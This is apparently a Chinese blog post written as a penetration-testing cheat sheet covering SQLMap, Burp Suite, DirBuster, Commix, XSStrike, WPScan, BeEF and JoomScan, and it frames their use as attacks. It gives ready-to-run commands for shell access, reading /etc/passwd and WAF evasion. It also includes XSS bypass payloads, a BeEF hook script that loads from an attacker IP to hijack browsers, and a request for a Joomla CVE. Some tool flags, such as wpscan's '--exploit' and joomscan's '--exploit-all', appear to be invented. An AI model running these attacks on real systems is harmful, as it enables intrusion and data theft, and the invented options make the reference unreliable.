2025-07-24
渗透测试
00
请注意,本文编写于 134 天前,最后修改于 134 天前,其中某些信息可能已经过时。

目录

1. SQLMap - 自动化SQL注入
2. Burp Suite - 专业Web渗透平台
3. DirBuster/Dirbuster - 目录爆破
4. Commix - 自动化命令注入
5. XSStrike - 高级XSS检测
6. WPScan - WordPress专项攻击
7. BeEF - 浏览器漏洞利用
8. JoomScan - Joomla!漏洞利用
工具对比表

1. SQLMap - 自动化SQL注入

作用:
自动化检测与利用SQL注入漏洞,支持数据库指纹识别、数据提取等

语法:

sh
sqlmap -u "<目标URL>" [参数]

核心参数:

  • 注入检测:
    • --level=5:测试深度(1-5,默认1)
    • --risk=3:风险等级(1-3,默认1)
    • --tamper=space2comment:混淆注入语句(绕过WAF)
  • 数据库操作:
    • --dbs:列举所有数据库
    • -D dbname --tables:指定数据库列举表
    • --dump -T users:导出指定表数据
  • 系统交互:
    • --os-shell:尝试获取系统Shell
    • --file-read=/etc/passwd:读取服务器文件

示例:

sh
sqlmap -u "http://example.com/news.php?id=1" --dbs --tamper=between,randomcase --level=5 --risk=3

2. Burp Suite - 专业Web渗透平台

作用:
拦截/修改HTTP请求、漏洞扫描、爆破攻击、逻辑漏洞测试

核心模块:

  • Proxy: 实时流量拦截与修改
  • Intruder: 参数爆破(支持Sniper/Battering ram等模式)
  • Repeater: 请求重放与调试
  • Scanner: 自动化漏洞扫描(需Pro版)

典型攻击流程:

  1. 浏览器配置代理(127.0.0.1:8080)
  2. 拦截请求 → 发送到Intruder进行参数爆破
  3. 使用Active Scan启动自动化扫描
  4. 通过Collaborator检测盲注漏洞

参数示例(爆破密码):

sh
# 使用Intruder的Cluster bomb模式爆破登录接口 POST /login HTTP/1.1 username=§admin§&password=§123456§

3. DirBuster/Dirbuster - 目录爆破

作用:
通过字典爆破Web隐藏目录与文件

语法(GUI):

  1. 启动:dirbuster
  2. 配置:
    • Target URL:http://example.com
    • Wordlist:/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    • 线程数:50-100(根据网络调整)
    • 文件扩展名:php,html,zip

CLI替代工具(gobuster):

sh
gobuster dir -u http://example.com -w wordlist.txt -x php,html -t 50

4. Commix - 自动化命令注入

作用:
检测与利用命令注入漏洞(支持OS命令/RCE)

语法:

sh
commix -u "http://example.com/cmd.php?input=test"

参数详解:

  • --os-cmd=whoami:执行指定系统命令
  • --shell:获取交互式Shell
  • --tamper=space2plus:混淆攻击载荷
  • --delay=1:请求间隔时间(防触发WAF)

示例:

sh
commix -u "http://example.com/ping.php?ip=127.0.0.1" --os-cmd="id" --tamper=base64encode

5. XSStrike - 高级XSS检测

作用:
智能化XSS漏洞检测与利用,支持绕过过滤机制

语法:

sh
python3 xsstrike.py -u "http://example.com/search?q=test"

参数详解:

  • --crawl:深度爬取目标网站
  • --blind:检测盲打XSS
  • --path:指定自定义Payload路径
  • --skip-dom:跳过DOM型XSS检测

Payload绕过技巧:

html
<svg/onload=alert(1)> <img src=x onerror="&#x61;lert(1)">

6. WPScan - WordPress专项攻击

作用:
WordPress漏洞利用(插件/主题RCE、权限提升等)

攻击参数:

  • --password-attack wp-login:爆破后台登录
  • --exploit theme:twentytwenty:利用指定主题漏洞
  • --max-threads 20:增加爆破线程

示例(主题漏洞利用):

sh
wpscan --url http://example.com --exploit theme:twentyfifteen

7. BeEF - 浏览器漏洞利用

作用:
劫持浏览器会话,实施客户端攻击

使用流程:

  1. 启动服务:
    sh
    beef-xss
  2. 注入Hook代码:
    html
    <script src="http://<Kali_IP>:3000/hook.js"></script>
  3. 在控制台(http://127.0.0.1:3000/ui/panel)执行:
    • 键盘记录
    • 钓鱼重定向
    • 漏洞利用(如WebRTC定位)

模块示例:

javascript
beef.execute(function() { alert('You are hooked!'); });

8. JoomScan - Joomla!漏洞利用

作用:
Joomla! CMS漏洞检测与利用

语法:

sh
joomscan -u http://example.com --enumerate-components --exploit-all

参数详解:

  • --enumerate-components:枚举安装的组件
  • --exploit-all:尝试所有已知漏洞利用
  • --cookiejar cookies.txt:使用认证Cookie

典型漏洞利用:

  • CVE-2023-23752: 未授权信息泄露
    sh
    curl http://example.com/api/index.php/v1/config/application?public=true

工具对比表

工具最佳适用场景攻击类型覆盖自动化程度
SQLMapSQL注入/数据库拖取数据库层攻击全自动
Burp Suite复杂逻辑漏洞/手动测试全类型Web漏洞半自动
XSStrikeXSS绕过与利用客户端脚本攻击
BeEF浏览器劫持/社会工程客户端攻击交互式
```

本文作者:晏秋

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!